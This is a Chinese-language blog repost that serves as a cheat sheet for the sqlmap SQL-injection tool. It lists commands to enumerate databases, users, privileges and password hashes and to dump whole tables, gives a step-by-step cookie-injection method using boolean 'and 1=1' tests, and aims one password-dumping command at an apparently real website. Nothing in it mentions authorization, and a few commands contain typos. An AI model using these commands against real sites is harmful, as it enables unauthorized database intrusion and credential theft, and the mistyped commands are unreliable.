首页 > 数据库技术 > 详细

sqlmap的使用

时间:2020-03-23 12:58:51      阅读:91      评论:0      收藏:0      [点我收藏+]

  

mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D ‘表‘ 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T ‘表‘ --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0


这儿我们将所有的库导出来,我想这就是前段时间盛传的脱裤吧,在执行这项操作的时候,会把所有的表里的内容导入到当前的一个目录下,看着清楚明了,但是花费的时间和很长。
sqlmap -u "http://www.newwide.com/newsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码

 

 

sqlmap检测asp网址
sqlmap -u 加地址 -u:检测是否存在sql注入 存在话返回数据库的名字
sqlmap -u 加地址 --tables 猜解所有表名字
sqlmap -u 加地址 --columns -T users(已猜出的表名) 根据users表猜表中的列名,
sqlmap -u 加地址 --dump -C "username,password" -T user --dump是下载数据 -C是指定列名 -T指定在user这个列里猜
sqlmap检测php网站

sqlmap -u 加地址 --is-dbs 测试是存在漏洞 是的话会返回数据库信息
sqlmap -u 加地址 --dbs 列出所有数据库
sqlmap-u 加地址 --current-db 查询当前自己测试网址所在的数据库
sqlmap-u 加地址 --tables -D “已猜出的数据库” 猜解这个数据库所有的表
sqlmpa-u 加地址 --columns -T“已猜出的表名” -D 指定数据库 查询所有的列 这次不是猜解
sqlmap-u 加地址 --dump -C “username,password” -T指定表 -D 指定数据库 查询列的字段


sqlmap之cookie注入:
Cookie注入典型步骤:
1.寻找形如“.asp?id=xx”类的带参数的URL。
2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。
3.清空浏览器地址栏,输入“javascript:alert(document.cookie="id="+escape("xx"));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用使用Request("id")这种方式获取数据的。
4.重复上面的步骤,将常规SQL注入中的判断语句带入上面的URL:“javascript:alert(document.cookie="id="+escape("xx and 1=1"));” “javascript:alert(document.cookie="id="+escape("xx and 1=2"));”。和常规SQL注入一样,如果分别返回正常和不正常页面,则说明该应用存在注入漏洞,并可以进行cookie注入。
5.使用常规注入语句进行注入即可。
例子:1.判断数据库,获取服务器,网站环境等参数


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --table --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --talbe --level 2

 


2.获取字段


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --columns -T 数据表 --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --columns -T admin --level 2

 


3.获取字段中的内容


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --dump -T 表名 -C "字段名1,字段名2" --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --dump admin -C "username,password" --level 2

 

 --count计数

 

sqlmap的使用

原文:https://www.cnblogs.com/ssw6/p/12551530.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!